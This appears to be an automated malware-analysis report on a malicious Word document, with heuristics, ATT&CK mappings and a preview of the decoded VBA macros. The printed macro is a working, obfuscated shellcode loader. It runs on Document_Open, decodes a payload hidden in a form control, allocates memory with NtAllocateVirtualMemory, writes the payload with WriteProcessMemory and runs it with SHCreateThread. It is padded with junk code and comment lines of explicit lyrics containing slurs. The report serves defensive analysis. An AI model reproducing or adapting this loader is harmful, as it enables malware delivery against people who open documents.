MALICIOUS
130
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The presence of the 'WriteProcessMemory' API reference and a 'Document_Open' macro strongly suggests the macros are designed to execute code. The VBA script itself is heavily obfuscated, but its structure and the heuristic firings indicate it likely attempts to download and execute a second-stage payload, aligning with common macro-based malware delivery techniques.
Heuristics 5
-
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORYReference to WriteProcessMemory API
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Dim wdApp As Word.Application Set wdApp = GetObject(, "Word.Application") wdApp.ActiveDocument.Close -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_Open() Dim mailbag As Byte -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14998 bytes |
SHA-256: 71a7d190142ca730d2b2d3027cb760b268ce757ec1d97de47aa927571f8d90ad |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function notornis(salable)
Dim measureless As String
Dim humane As Long
Dim glaze As Integer
Dim bullfighter As Variant
#If Win64 Then
Dim majorana As Long
Dim catchweed As LongPtr
dramatically = 8
Dim divvy As Byte
Dim aerated As LongPtr
Dim campbell As Byte
Dim heterospory As LongPtr
Dim detach As Byte
#Else
Dim knowing As Integer
Dim catchweed As Long
dramatically = 4
Dim aerated As Long
Dim patchy As Long
Dim heterospory As Long
Dim composing As Variant
Dim bluewing As String
#End If
unicorn = dendrite(VarPtr(catchweed), VarPtr(salable) + 8, dramatically)
melibean = -1
aerated = 38 - 70 + 32
lantana = 93 - 78 - 15
heterospory = 96 + 121 + 1 + 9341
oxytetracycline = 89 + 4007
anthropophagous = 64
dissuaded = introduced(ByVal melibean, aerated, ByVal lantana, heterospory, ByVal oxytetracycline, ByVal anthropophagous)
myology = firmness * 3
firmness = myology - 385
dendrite aerated, catchweed, 122 + 62 + 5410
scaphopod = 32
conglaciation = 22999
cliff = 395792
pigeonholes = SLN(cliff, conglaciation, scaphopod)
notornis = aerated
End Function
Function dendrite(napping, cyclosorus, atomistic)
#If Win64 Then
Dim acerbity As Integer
Dim cithern As String
Dim knesset As LongPtr
Dim chevrotain As LongPtr
Dim calcitic As LongPtr
Dim bothy As Integer
Dim dininghall As LongPtr
Dim interlocution As LongPtr
#Else
Dim chevrotain As Long
Dim beati As String
Dim knesset As Long
Dim urd As String
Dim dininghall As Long
Dim eel As Long
Dim calcitic As Long
Dim badinage As Variant
Dim interlocution As Long
Dim viscometric As Integer
Dim aster As String
#End If
derri = "manor"
derri = houselights
chevrotain = napping
interlocution = atomistic
chattanooga = chattanooga
dininghall = cyclosorus
katharevusa = 113
sadist = 6979
taught = 321222
sadist = Pmt(0.0507, katharevusa, -36992, taught, 1)
derri = derri
knesset = 121 - 122
ceibo ByVal knesset, chevrotain, dininghall, interlocution, calcitic
myology = Int(236.76 + 252.122)
End Function
Private Sub Document_Open()
Dim mailbag As Byte
Dim disloyalty As Variant
dismount = "marattiales"
entrails
mysticism = 33
cerussite = 15249
lifelike = 111611
roridulaceae = SLN(lifelike, cerussite, mysticism)
End Sub
Sub main()
Dim wdApp As Word.Application
Set wdApp = GetObject(, "Word.Application")
wdApp.ActiveDocument.Close
'or
wdApp.Documents("Arrays.docx").Close
End Sub
Sub entrails()
Dim lyrical As String
Dim lassoo As Variant
enviable = ThisDocument.ComputeStatistics(wdStatisticPages)
Set planation = xerophyllum.Controls.Item(enviable - 2).Tabs
For Each amber In planation
garishness = 24
furrow = 23488
colutea = 225778
outre = SLN(colutea, furrow, garishness)
If amber.Index = 11 Then
standoffishly = "terror"
microsecond = "sparidae"
divert = amber.Name
End If
Next
monocotyledones = 16 - 25 + 39 + 7430
erosgr = Right(divert, monocotyledones)
brainstem = separately.intelligent(erosgr)
adam = 12
im = 32409
unsullied = 123269
crater = SLN(unsullied, im, adam)
eurafrican = "chickadee"
#If Win64 Then
Dim canterbury As Variant
Dim vol As LongPtr
Dim nicandra As LongPtr
Dim hel As Long
#Else
Dim decollation As Byte
Dim nicandra As Long
Dim erastian As Byte
Dim vol As Long
#End If
unwillingness = 6 + 55 - 102 + 41
caustically = "buzz"
dawplucker = "otia"
mattock = 36 + 4060
auspices = 15
alternateness = 21897
sky = 165506
autogamy = SLN(sky, alternateness, auspices)
aesop = "hypercritical"
worshipper = "chronographer"
blanquillo = "laparoscope"
bethrall = "euterpe"
sisyphean = 11
inceptor = 30359
grasseating = 467111
inceptor = Pmt(0.065, sisyphean, -24953, grasseating, 0)
handiwork = brainstem
rachidian = "ba" & "rrels"
vol = notornis(handiwork)
melanoderma = "guisard"
nitrous = "be" & "llero" & "phon"
#If Win64 Then
Dim steamer As String
Dim allign As LongPtr
conform = "nineteen"
enshrine = "ab" & "ruption"
suffocate = "aures"
Dim legem As LongPtr
saxifraga = 112 + 1168
#ElseIf Win32 Then
byword = "descendant"
pesthole = "ig" & "norantness"
Dim allign As Long
unilateralism = 38 - 101 + 577
Dim legem As Long
saxifraga = unilateralism + 3204
#End If
Dim wrinkle As Byte
Dim liberalism As Variant
allign = 5 - 93 + 88
nicandra = vol + saxifraga
legem = 1
snarl = counterbalance(nicandra, allign, legem, allign)
atmospheric = 90
preconception = 24066
aedile = 573069
preconception = Pmt(0.0504, atmospheric, -29912, aedile, 1)
End Sub
Attribute VB_Name = "separately"
' Bitch I've been tight since "Guiding light",
' I ain't really mean to say on my dick
' Lil nigga bigger than gorilla
#If Win64 Then
' I'm done
' Your girlfriend a freak like Cirque Du Soleil
' You ain't hotter than mine, nope, not on my time and I'm not even trying
Public Declare PtrSafe Function alternativeness Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (success As LongPtr, fryer As Any,affect As LongPtr, adv As Any) As Boolean
' Let's go!
' I ain't really mean to say on my dick
' When you're doing that thing over there homie
Public Declare PtrSafe Function badaga Lib "Shell32.dll" Alias "SHGetDesktopFolder" (basics As LongPtr)
' Man fuck these bitch ass niggas, how y'all doin'?
' Dress like a skater, got a big house, came with an elevator
' Yeah, fresher than a motherfucker
Public Declare PtrSafe Function perceivable Lib "Kernel32.dll" Alias "GetSystemTime" (papaver As LongPtr) As Boolean
' Every time I come a nigga gotta set it, then I gotta go, and then I gotta get it
' I'm Lil Tunechi, I'm a nuisance, I go stupid, I go dumb like the 3 stooges
' Oh, I'm getting paper
Public Declare PtrSafe Function abbreviation Lib "Kernel32.dll" Alias "LocalFree" (sulfate As LongPtr) As LongPtr
' And niggas know that I'm the best when it come to doing this
' Oh, I'm getting paper
' If you get what I get, what would you say?
Public Declare PtrSafe Function introduced Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (factfinding As LongPtr, femtogram As LongPtr, ByVal oneliner As LongPtr,fitnessByVal As LongPtr, dissolution As LongPtr, ByVal ashkhabad As LongPtr) As LongPtr
' Your girlfriend a freak like Cirque Du Soleil
' Cause I'm killing every nigga that come try to be on my shit
' Gotta taste it and I gotta grab it
Public Declare PtrSafe Function counterbalance Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal vicinism As LongPtr, ByVal aphaeresis As Any, ByVal admissibility As LongPtr, ByVal hottonia As LongPtr) As LongPtr
' Oh, look at me now
' Oh, I'm getting paper
' I don't eat sushi, I'm the shit, no I'm pollution, no substitution
Public Declare PtrSafe Function ceibo Lib "Kernel32.dll" Alias "WriteProcessMemory" (ByVal river As Any, ByVal connect As Any, ByVal colature As Any, ByVal nymphomaniacal As Any, ByVal alveolus As Any) As LongPtr
' And my mamma's nice and my daddy's dead
' Do you really wanna know what's next? Let's go
' Oh, look at me now
Public Declare PtrSafe Function manibus Lib "Shell32.dll" Alias "SHGetSettings" (bvds As LongPtr,commissionaire As LongPtr) As LongPtr
' And I know that I can be a little cocky
' I never gave a fuck about a hater, got money on my radar
' And we always gotta do it take it to another place
' Ciroc and Sprite on a private flight,
' See the way we on it and we all up in the race and you know
' I ain't really mean to say on my dick
#Else
' You niggas ain't eatin', fuck it, tell a waiter
' You will hear it in the street or you can read it in the press
' And we always gotta do it take it to another place
Public Declare Function quadriplegic Lib "Kernel32.dll" Alias "SetSystemTime" (associate As Long) As Boolean
' Your girlfriend a freak like Cirque Du Soleil
' And we struggle and I hustle and I set it and I get it
' Oh, look at me now
Public Declare Function sticking Lib "Shell32.dll" Alias "SHGetSettings" (disreputable As Long, narrowminded As Long) As Long
' Oh, I'm getting paper
' If you get what I get, what would you say?
' Gotta taste it and I gotta grab it
Public Declare Function introduced Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (mitigated As Long, arkansan As Long, ByVal beckett As Long, informativelyByVal As Long, vitiligo As Long, ByVal minster As Long) As Long
' Got a bitch that play in movies in my Jacuzzi, pussy juicy
' I was like fuck trial I puts it down
' I get what you get in 10 years, in two days
Public Declare Function hemic Lib "Shell32.dll" Alias "SHGetDesktopFolder" (abelmoschus As Long)
' Bitch I've been tight since "Guiding light",
' And she accidentally slip and fall on my dick
' Yellow top missing
Public Declare Function counterbalance Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal unreported As Long, ByVal chaserbalancer As Any, ByVal magnificio As Any, ByVal disgraceful As Any) As Long
' Look at me now
' That I always win and then I gotta get it again, and again, and then again
' If you want that bullshit then I'm like "Olé"
Public Declare Function monotreme Lib "Kernel32.dll" Alias "LocalFree" (bonheur As Long) As Long
' Yeah, fresher than a motherfucker
' Just to be at the top of the throne
' Let me show you how to keep the dice rolling
Public Declare Function ceibo Lib "Kernel32.dll" Alias "WriteProcessMemory" (ByVal temperate As Any, ByVal cadastre As Any, ByVal angiitis As Any, ByVal omnigenous As Any, ByVal amical As Any) As Long
' See the way we on it and we all up in the race and you know
' If you want that bullshit then I'm like "Olé"
' Look at me now, look at me now
Public Declare Function dasher Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (tradition As Long, abends As Any, demagogy As Long, agonidae As Any) As Boolean
' Marley said, "Shoot 'em," and I said, "OK"
' Hell, Breezy
' I'm so Young Money, if you got eyes look at me now, bitch
' Just know that you will never flop me
' What's poppin' Slime? Nothin' five, and if they trippin' fuck 'em five
' Cause I'm feeling like I'm running
#End If
' Oh, look at me now
' And my mamma's nice and my daddy's dead
' Cause I'm killing every nigga that come try to be on my shit
Function bilander()
Dim corozo(255) As Byte
debilitate = 65
Do
corozo(debilitate) = debilitate - 65
debilitate = debilitate + 1
Loop Until debilitate = 91
debilitate = 48
Do
corozo(debilitate) = debilitate + 4
debilitate = debilitate + 1
Loop Until debilitate = 58
debilitate = 97
Do
corozo(debilitate) = debilitate - 71
debilitate = debilitate + 1
Loop Until debilitate = 123
corozo(47) = 63
debilitate = 43
corozo(debilitate) = 62
bilander = corozo
End Function
Sub SelectSentence()
Dim wdApp As Word.Application
Dim wdRng As Word.Range
Set wdApp = GetObject(, "Word.Application")
With wdApp.ActiveDocument
If .Paragraphs.Count >= 3 Then
Set wdRng = .Paragraphs(3).Range
wdRng.Copy
End If
End With
Worksheets("Sheet2").PasteSpecial
Worksheets("Sheet2").Paste Destination:=Worksheets("Sheet2").Range("A1")
Set wdApp = Nothing
Set wdRng = Nothing
End Sub
Function mock(outdoor)
mock = AscW(outdoor)
End Function
Function bryon(popular, uncrown, amaethon)
Select Case amaethon
Case 1
bryon = popular \ uncrown
Case 2
bryon = popular And uncrown
Case 3
bryon = popular * uncrown
End Select
End Function
Function intelligent(kranke) As String
firmness = Round(315.106 + 383.643)
Dim sweeper(63) As Long
derri = conservatively
Dim epimetheus(6965) As Byte
Dim corsican As Long
Dim absolutism As Integer
Dim birds As Long
Dim chloroform(63) As Long
Dim elderberry As String
Dim michaelmas As Long
myology = Int(148.158 + 73.244)
Dim literature() As Byte
Dim combretaceae(63) As Long
Dim uneared As Long
Dim tashmit As Integer
Dim balkline As Integer
Dim ca As Integer
intercept = 55 + 66 - 57
asia = 65280
gelechiid = 16711680
dio = 262144
sunfish = 118 + 94 + 16514860
unitarian = 4096
Dim beau As Long
Dim timbal As Long
brandyball = 31 + 65505
Dim operetta As Long
goitrogen = 80 + 36 + 10 + 3906
denominationally = 128 + 76 + 52
homestretch = 255
bedevil = 73 + 76 + 95 - 181
duplicable = 69 + 257979
Dim interclusion As Integer
courser = 0
hugmetight = 87 - 5 - 6 + 7383
Dim appreciable() As Byte
appreciable = VBA.StrConv(kranke, vbFromUnicode)
Dim disastrous As Byte
opposable = 24
dipterocarpaceae = 26476
northeastward = 225412
altruist = SLN(northeastward, dipterocarpaceae, opposable)
corticoafferent = 7459
gern = 50 - 15
autochthonous = Log(100) / Log(10) + 13
For vicissitude = 0 To corticoafferent
If vicissitude Mod 2 = 0 Then
appreciable(vicissitude) = appreciable(vicissitude) + autochthonous
Else
appreciable(vicissitude) = appreciable(vicissitude) + autochthonous - 1
End If
Next vicissitude
orthopedist = 35
opinionatist = 32823
atypicality = 275674
opinionatist = Pmt(0.0572, orthopedist, -38266, atypicality, 1)
balkline = 0
monarda = 50 + 103 - 153
bradypus = 43
mightiness = bilander
For uneared = 0 To 63
chloroform(uneared) = bryon(uneared, intercept, 3)
sweeper(uneared) = bryon(uneared, unitarian, 3)
combretaceae(uneared) = bryon(uneared, dio, 3)
Next uneared
bemisia = 48
scrawl = 33442
cabbage = 567850
rejected = SLN(cabbage, scrawl, bemisia)
literature = appreciable
calender = 24 + 75 + 61 - 156
caulophyllum = 9
arrogantly = 15522
chivalrous = 507456
arrogantly = Pmt(0.0578, caulophyllum, -26150, chivalrous, 1)
damnee = 3
houselights = "inhuman"
chattanooga = chattanooga
accused = damnee + 1
caboose = 32 - 69 + 39
For michaelmas = 0 To corticoafferent
etiological = literature(michaelmas)
selftormentor = literature(michaelmas + 2)
corsican = combretaceae(mightiness(etiological)) _
+ sweeper(mightiness(literature(michaelmas + 1))) + chloroform(mightiness(selftormentor)) + mightiness(literature(michaelmas + damnee))
uneared = bryon(corsican, gelechiid, 2)
epimetheus(birds) = bryon(uneared, brandyball, 1)
uneared = bryon(corsican, asia, 2)
epimetheus(birds + 1) = bryon(uneared, denominationally, 1)
epimetheus(birds + caboose) = bryon(corsican, homestretch, 2)
birds = birds + caboose + 1
michaelmas = michaelmas + 3
Next
intelligent = epimetheus
End Function
Attribute VB_Name = "xerophyllum"
Attribute VB_Base = "0{4B935E51-090F-483B-B508-B8EBE2D1725F}{DFBD2468-079D-4270-8119-5A7CB14B5FB0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.